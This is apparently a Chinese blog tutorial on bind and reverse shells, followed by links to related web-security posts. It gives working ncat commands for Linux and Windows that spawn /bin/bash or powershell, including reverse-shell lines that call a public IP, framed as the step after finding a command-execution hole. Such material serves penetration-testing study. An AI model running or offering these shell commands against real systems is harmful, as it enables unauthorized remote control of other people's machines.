正反向shell

正反向shell

在实际的应用场景中一般是先找到可以命令执行的漏洞,如果目标主机没有ncat我们要先执行下载ncat命令在被控的服务器上

正向shell

应用场景:在被控端的访问没有限制的时候,控制端向被控端发起了链接,控制端可以是公网ip也可以是内网ip

被控端为Linux:

shell 复制代码
被控端:ncat -lvp 8888 -e /bin/bash
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 /bin/bash

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

被控端为Windows

shell 复制代码
被控端:ncat -lvp 8888 -e powershell
作用:使用 ncat 工具创建一个监听端口,并在接收到连接时执行 powershell

控制端:ncat 117.50.117.71 8888
作用:使用ncat连接到指定的ip地址和端口

在连接成功了之后(即在被控制端输入ncat 117.50.117.71 8888后)就可以输入指令查看被控端的各种信息

如图:

反向shell

应用场景:在被控端口发访问有限制,控制无法直接访问到被控端

由被控端向控制端发起连接,控制端要具备公网地址

被控端为Linux:

shell 复制代码
被控端:ncat 117.50.177.71 9999 -e /bin/bash
作用:使用ncat连接到指定的ip地址端口,在建立连接后执行bashshell
控制端:ncat -lvp 9999
作用:监听指定端口

被控端为Windows

shell 复制代码
被控端:ncat 117.50.117.71 8888 -e powershell
作用:使用ncat连接指定的地址端口,并在连接成功后执行 powershell

控制端:ncat -lvp 8888
作用:监听指定的端口

在控制端监听后即可对被控端控制

相关推荐
终焉暴龙王2 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川3 小时前
Apache文件解析漏洞
web安全·apache
希望奇迹很安静10 小时前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南12 小时前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
北极光SD-WAN组网1 天前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全
落鹜秋水1 天前
Cacti命令执行漏洞分析(CVE-2022-46169)
web安全·网络安全
未来之窗软件服务1 天前
网站访问信息追踪系统在安全与性能优化中的关键作用——网络安全—仙盟创梦IDE
安全·web安全·性能优化·仙盟创梦ide·东方仙盟
介一安全2 天前
【Web安全】逻辑漏洞之URL跳转漏洞:原理、场景与防御
安全·web安全·安全威胁分析·安全性测试·逻辑漏洞·url跳转
希望奇迹很安静2 天前
文件包含学习总结
安全·web安全·渗透测试学习
波吉爱睡觉2 天前
文件解析漏洞大全
web安全·网络安全